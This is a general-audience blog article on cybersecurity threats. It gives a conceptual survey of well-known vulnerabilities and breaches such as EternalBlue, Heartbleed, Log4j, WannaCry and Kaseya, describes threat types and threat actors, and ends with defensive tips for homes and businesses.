Types of Cybersecurity Threats, and How to avoid them?
Land, sea, air, space, and information are the five domains of warfare that the United States military recognizes nowadays. You should have expected the first four terms but information? Has information become that important to be the main warfare domain for the military of one of the greatest powers in the world? And the answer is obviously yes it is.
Many countries nowadays believe a cyberattack with zero physical damage can be way more harmful than a bloody war. Going from that perspective, they have created specialized information security sections and teams to serve their political purposes by trying to get information about enemies and other countries. They also can have teams ready to deliver cyberattacks against any country that may threaten their national security.
Back in 2010, an Iranian nuclear station was paralyzed completely, scientists and workers thought it was a normal technical issue and could be solved easily. However, that wasn't the case. Can you believe that a sophisticated piece of malware was the root cause of that damage! As it would not be politically justified to start a war with such a country to stop this project but malware on a USB stick was enough to make the job done.
The previously mentioned malware is called Stuxnet and it is considered one of the most complex malware ever discovered. It is also one of the early reasons that forced many countries to pay attention to the importance of information.
In this article, we are going to discuss what are cybersecurity threats, their types, and their sources. Then, we will suggest useful tips to minimize the scope of cybersecurity threats.
What is a Cybersecurity Threat?
A cybersecurity threat is any method a malicious person would use to have unauthorized access to your devices and systems. It can also cause data damage, leakage, or misuse in general. Cyber threats can originate from many sources including lone hackers, hacktivists, terrorist groups, company spies, criminal organizations, and others.
In the following section, we will discuss some of the most famous cyber-attacks and threats, then will show why we should try to make ourselves protected from cybersecurity threats.
Famous Cybersecurity Threats Examples
Well, there are a lot of cybersecurity threats but we will go through the most famous threats that had a wide echo when it was discovered.
1- Eternal Blue (MS17-010)
Eternal blue is one of the most famous exploits ever used to gain remote access on windows machines. It was developed by NSA(U.S. National Security Agency) and was leaked publicly by shadow brokers in 2017. EternalBlue is an exploit that can be used to remotely access Windows computers running SMB which was something that was installed by default on all Windows machines, making millions of Windows computers vulnerable to this exploit.
Now, you can imagine the threat of having this dangerous exploit publicly available for anyone to use. The threat didn’t stop at this level and WannaCry Ransomware has used this exploit to attack unpatched computers as they have used eternal blue to deliver their ransomware.
2- Shell Shock (CVE-2014-6271)
Shellshock is a security vulnerability in the Unix bash shell causing Bash to execute commands from environment variables unintentionally. Without going deep in technicalities but in short, exploiting the vulnerability allows the attacker to remotely issue commands on the server, which is known as remote code execution.
It was so popular as it was a vulnerability in bash itself that is why it is also known as Bashdoor. And of course, threat actors wouldn’t stop at this point, they have used this vulnerability in the initial hours when it was disclosed to create botnets of vulnerable systems (A bot is a piece of malicious software that gets orders from a master), then use them to perform DDoS (Distributed Denial of service) attack on other targets.
Kerberos is a computer network authentication protocol that works based on tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner, so based on the latter definition it seems this protocol is extremely important.
However, in 2014, there was a flaw in Kerberos itself allowing a regular authenticated domain account to elevate permissions to compromise an entire domain (Elevate from regular user to administrator of the domain). So back then if an attacker gained access to one domain user account he could compromise the entire domain.
So you can imagine the threat if a single domain containing thousands of users and any one of them could be the domain administrator accessing sensitive information, databases, and other users' accounts.
It is an old vulnerability (back in 2008) But it is worth mentioning as it was very popular when it was discovered. According to Microsoft, this is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely.
On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-based systems, an attacker could exploit this vulnerability without authentication and could run arbitrary code. If an exploit attempt fails, this could also lead to a crash in some server services, this server service provides file, print, and sharing over the network. So in short, if your system wasn’t patched to this vulnerability and the attacker exploited it he would either gain remote code execution or at least will cause disturbance in your system.
At the time of release the Conficker worm was taking advantage of MS08-067 in the wild and exploiting every vulnerable system it came across. Also, other worms and malware used this vulnerability to attack Windows systems.
5- Heartbleed (CVE-2014-0160)
Of course, you have heard about HTTPS and the S letter stands for secure, but how is the connection secured? Well with simple words it encrypts the connection between your side and server-side so if an attacker is sniffing your network he will not understand anything and will not be able to steal your data. This encryption is made by a sort of software called OpenSSL which uses SSL encryption.
So far so good, the issue is the server can't open socket connections with a lot of users at the same time and it will close any non-active connection when it is possible, to check if the connection is alive or not using an extension called Heartbeat. Simply, it can check the connection status by sending a message and the other side should send it back, for example, if it sends 1 KB the other side will reply with a 1 KB message. As this communication doesn’t have any confidential information it wasn’t encrypted.
Unfortunately, hackers can manipulate this request by sending up to 64KB messages and the server will respond with 64KB from its memory, these bytes can be garbage or sensitive information. That’s why attackers send a lot of requests and most likely they will retrieve something juicy eventually. That is why this vulnerability is called HeartBleed.
Bugs in single software or libraries come and go and are fixed by new patches. However, this bug has left a large number of private keys and other secrets exposed to the Internet.
6- Dirty COW (CVE-2016-5195)
According to Redhat, a race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. So basically vulnerable kernels will allow local users to be the superuser (root).
This kernel-level exploit affects many Linux systems and the Exploitation of this bug does not leave any trace of anything abnormal happening to the logs. So if a system is not updated it will be facing this great threat which allows any low-privileged user to be the superuser easily.
7- Pwnkit (CVE-2021-4034)
This vulnerability was discovered by Qualys research team at the end of 2021 so it is recent and a lot of systems are vulnerable to it until now. It affects most Linux distributions because of a memory corruption vulnerability in polkit’s pkexec (a SUID-root program that is installed by default), it basically will let any low-privilege user exploit it and gain root privilege on the vulnerable host.
8- log4j vulnerability (CVE-2021-44228)
According to Java 3 billion devices are running java and recently it was a big event when we heard about a vulnerability in the log4j package in java and it can be hacked. Even some Minecraft servers were vulnerable. The vulnerability allows unauthenticated remote code execution. This vulnerability can be found in products of some of the most famous technology vendors such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMWare. So it was a great threat with a wide threat surface.
At this level, we should have a clear image of how bad a security threat is as it can lead to system compromise, leaking data, and damaging systems. We have also seen examples of threat actors taking advantage of other threats to have more powerful effects. So it is really important to keep updated with the latest vulnerabilities and patch your systems and assets if they are vulnerable.
Now, we will discuss some of the most famous and recent cyber attacks.
Famous Cyber Attacks:
NASA Cyber Attack (1999)
Back in 1999, a 15 years old American hacker caused the shutdown of NASA computers for 21 days costing them a recovery cost of $41,000. This young boy has become the first young hacker to be incarcerated for computer crimes by spending 6 months in jail for his cybercrimes.
The Biggest Password Leak (2009)
Rockyou.txt, of course, if you are in the cybersecurity field then you have heard about it, it is a huge wordlist containing more than 8.4 billion entries (at 2021), but what is the story behind this wordlist? RockYou was a company that developed widgets for MySpace and implemented applications for various social networks and Facebook.
By the end of 2009, a SQL injection vulnerability was discovered in their website which was used by over 32 million people back then the biggest problem wasn’t the vulnerability but it was that they were storing their users' passwords in plaintext which meant after the SQLi the passwords were already exposed. The passwords were posted publicly in forums after that, from then people started appending the list by any new password breach until it became the famous rockyou.txt you know. Mentioning passwords, you can check our other article here to know what to do if your password got hacked.
Adobe Cyber Attack (2013)
One of the top 17 biggest data breaches in our century, back in 2013 hackers stole login information and nearly 3 million credit card numbers from 38 million Adobe users. The breach was known when the data was for sale on the dark web.
The company also reported that the attackers stole source code to three other products: Acrobat, ColdFusion, and ColdFusion Builder which was huge damage for Adobe back then. Read Adobe cyber attack for more details.
Target Cyberattack (2013)
And the winning year of the largest data breaches is 2013, as cybercriminals managed to access data during the holiday season of about 40 million credit and debit card accounts that had made purchases at Target. This incident also cost target chains around $18.5 million in a multistate settlement of lawsuits brought against them. [Red river]
Ukraine’s Power Grid Attack (2015)
It is the first publicly acknowledged successful cyberattack on a power grid. The Ukraine power grid hack was a cyberattack on Ukraine's power grid in December 2015, resulting in power outages for around 225,000 consumers in Ukraine for 1-6 hours. The attack took place during an ongoing Russian military intervention in Ukraine and is attributed to a Russian APT (advanced persistent threat) group known as "Sandworm".
The first part of the attack is believed to take advantage of an updated version of the BlackEnergy malware. The malicious code was sent through emails (Phishing) with malicious attachments, targeting specific individuals within the different energy companies to retrieve administrator credentials and gain access to the energy substation networks.
During the second phase, the actors activated a KillDisk destructive malware, which was able to wipe parts of computers’ hard drives and prevent the systems from rebooting, ultimately leading to power outages. [Reference]
WannaCry Ransomware (2017)
We have already discussed before the eternal blue threat and how attackers make use of it to develop a more robust threat which is the WannaCry ransomware. The ransomware epidemic of 2017 disrupted hospitals, banks, and communications companies worldwide. And after 4 years during the covid-19 pandemic, it has returned taking advantage of the remote work transformation as it has been easier for them to deliver their malicious programs. Check our article to know how to secure yourself while working from home.
Kaseya Supply Chain Ransomware Attack (2021)
In July 2021, Kaseya VSA and multiple managed service providers (MSPs) were hit by a supply-chain ransomware attack. Kaseya provides technology that helps other companies to manage their information technology. Kaseya has received reports from customers and others suggesting unusual behavior occurring on endpoints managed by the Kaseya VSA on-premises product.
The attack is said to have been executed by a Russian hacking group known as REvil. REvil has been around since 2019, deploying ransomware tactics to hack targets around the world and making a fortune from ransomware payments. REvil has taken its tactics to a higher level by deploying its ransomware via a supply-chain attack that exploits internet services’ interconnectivity to leverage a larger attack surface. [Reference]
So now after we have showcased some famous threats that can be exploited and discussed some famous cyber attacks, you should have a clear image of why we should protect ourselves from cyber security threats. Cybersecurity threat actors are a threat for all companies around the world but the difference between these companies is how they will behave when they are against a real threat and how they will find their way out of any cyber attack.
Types of Cybersecurity Threats:
In the following section, we are going to briefly discuss the most famous types of cybersecurity threats. To get more details about the types of threats, you check our previous article here.
Malware attacks are the most common type of cyberattack. Malware is defined as malicious software which gets installed into the system when the user clicks a dangerous link or downloads stuff from untrusted sources. Once the malware is inside the system, it can block access to critical components of the network, damage the system, and gather confidential information. and if the malware is designed for a specific target it may spread across the network until achieving the goal it was made for.
A program hiding inside a useful program with malicious purposes. It is usually installed because of downloading from untrusted sources. A trojan is commonly used to establish a backdoor to be exploited by attackers.
A type of program installed to gather information about users, their systems, or browsing history, sending the data to a remote user. The attacker can then use the information for blackmailing purposes or download and install other malicious programs from the web. It is worth mentioning one of the most famous Spywares ever and it is Pegasus which is developed by the NSO group.
This spyware is targeting mobile phones (ios and android). Pegasus is capable of reading text messages, tracking calls, collecting passwords, location tracking, accessing the target device's microphone and camera, and harvesting information from apps. This spyware is usually used by governments to track criminals and achieve political plans.
Cybercriminals send malicious emails that seem to come from legitimate resources. The user is then tricked into clicking the malicious link in the email, leading to malware installation or more malicious behaviors. Phishing campaigns have increased in the last couple of years targeting people who are working from home or High privileged users in a company.
Advanced Persistent Threats (APT)
An advanced persistent threat occurs when a malicious actor gains unauthorized access to a system or network. Unlike some other hacks, APT aims to gain higher access over the network and maintain their access undetected and for an extended time to steal a variety of sensitive information.
This type of attack is evolving and contains organized phases until reaching their goal. These phases can be: gaining access, privilege escalation, lateral moving, post-exploitation, and other phases depending on the target infrastructure.
A lot of Data breaches have happened as a result of a small mistake by a careless employee or unintentionally. According to Kaspersky's definition; a data breach exposes confidential, sensitive, or protected information to an unauthorized person. The files in a data breach are viewed and/or shared without permission.
Data breaches result in not only that you have to change your password in many cases, but the effects of a data leak can also be a lasting issue for your reputation, finances, and more.
Zero-Day means a vulnerability discovered recently that attackers can use to attack systems and it has no fix yet. These kinds of risks don’t have a direct solution but we can make sure we are using updated software.
Sources of Cybersecurity Threats:
Now, as we have to know the types of threats, we can discuss the sources of cybersecurity threats so we can try to avoid them.
Usually, hackers are moving around scanning networks and see if there are vulnerabilities in a computer system or a network and then exploit them to gain access. They do it for several purposes: financial gain, revenge, stalking, personal gain, etc. Hackers can also do this to brag in the hacker community.
They are usually targeting a large number of people, not an individual, they use some techniques like phishing, spyware, malware, or ransomware for the goal of financial gain. They can be considered organized hackers.
Corporate spies' goal is to make a profit by leaking sensitive information about a company or causing damage for the benefit of a competitor. The main difference between spies and insiders is that spies are an outside threat.
Insiders can include employees, third-party vendors, contractors, or other business associates who have legitimate access to enterprise assets but misuse that access for either personal or financial reasons.
Hacktivists do their activities for political reasons mainly and not for financial gain. They target companies, organizations, or individuals who don’t get along with their political thoughts and agenda. Their purpose is to gain visibility for a cause they are promoting.
Terrorists launch the cyber-attacks to destroy and exploit systems, networks, and infrastructures without any negotiation, they just do it. They can also cause harm for an individual if they have the chance. Their main goal is to destroy, disrupt the economy and spread fear.
Cybersecurity Best Practices to Protect from Cyber Threats:
Today’s threats are not only the threats we are used to hearing about as remote jobs have opened new chances for malicious people to deliver their attacks so we should be aware enough to face all these threats.
In the following section, we will discuss some useful tips to minimize the threat surface as possible.
How to Prevent Cyber Attacks at Home:
We have a full article discussing this topic in further detail you can check it here. But we can mention quick points:
• Secure your home network.
• Use strong passwords.
• Connect to your company’s network through a VPN.
• Invest in Backup storage (cloud, hard drive).
• Use separate devices for work and others for personal usage.
• Do not open emails from untrusted sources.
• Do not download software from untrusted websites.
• Use your company’s tool kit.
• Make available updates and patches for your systems and software.
• Turn on two-factor authentication on your accounts.
• Secure your home router.
How to Prevent Cyber Attacks on Businesses?
- Train Employees
Employees are the first line of defense against cyber threats for any organization. organizations must provide cybersecurity awareness programs to train employees on recognizing and responding to cyber threats and to report anything they feel is abnormal. This should raise their security awareness.
- Update Systems and Softwares
We have mentioned before some famous vulnerabilities and here is the solution to avoid being exploited, it is simply “update”. Software companies release patches to resolve vulnerabilities and keep you safe. So check that you have the latest versions of the operating system and software.
- Backup Data
If you have all your pieces of jewelry in one box will that be safe? Well, if you limit access to it and do the best practices it should be safe. Backing up data regularly helps reduce the risk of data breaches.
- Perform a Regular Cyber Risk Assessment
It is a great effective idea to perform risk assessments. It means you can hire a team to do what a cyber threat actor might do to compromise your network. Their job is trying to get unauthorized access and if they did they will see what will be the furthest point the real attacker can reach. This will show clearly what the security flaws are in your systems and will test the employees' awareness.
- Secure your Devices and Network
If you have a lot of departments in your company you should perform isolation which means each department should have its own small network making other departments unable to access it. This will limit an attacker if he gains access to one department that doesn’t mean he can go beyond it. Also, make use of modern solutions to detect and prevent malicious behavior on your network like Firewalls, IDS, IPS, Deep packet inspections, and others.
- Set Policies
Commonly, an attacker who gains low privilege access (maybe due to un-updated software or old operating system) can escalate his privilege to gain higher privilege may be the administrator of the network and that is due to the bad policies which are set by the administrator. There must be restricted policies for admin access, don’t give unnecessary access to any user, if a user needs admin access to do a specific task make sure you remove it after he is done. Follow the best practices like applying Least-Privilege Administrative Models read here.
- Build a Cyber Incident Response Plan
More than 80% of companies knew they got hacked after months of the attack itself. Some companies don't even know if they got attacked. For whatever factor, you can be attacked so when this time comes you should be prepared.
Performing Risk Assessment is the first step to know security flaws and even know if there is malicious behavior at your network. The cyber incident response plan consists of instructions on how to respond to a serious security incident, such as a data breach, data leak, ransomware attack, or loss of sensitive information.
According to The NIST incident response lifecycle, it breaks incident response down into four main phases: Preparation, Detection and Analysis, Containment, Eradication, and Recovery, and Post-Event Activity.
Finally, here are the golden tips: get prepared for anything, backup your data, enforce restricted security policies, get updates and patches, and hope you will be far away from malicious eyes.
Want to learn more? Discover related articles.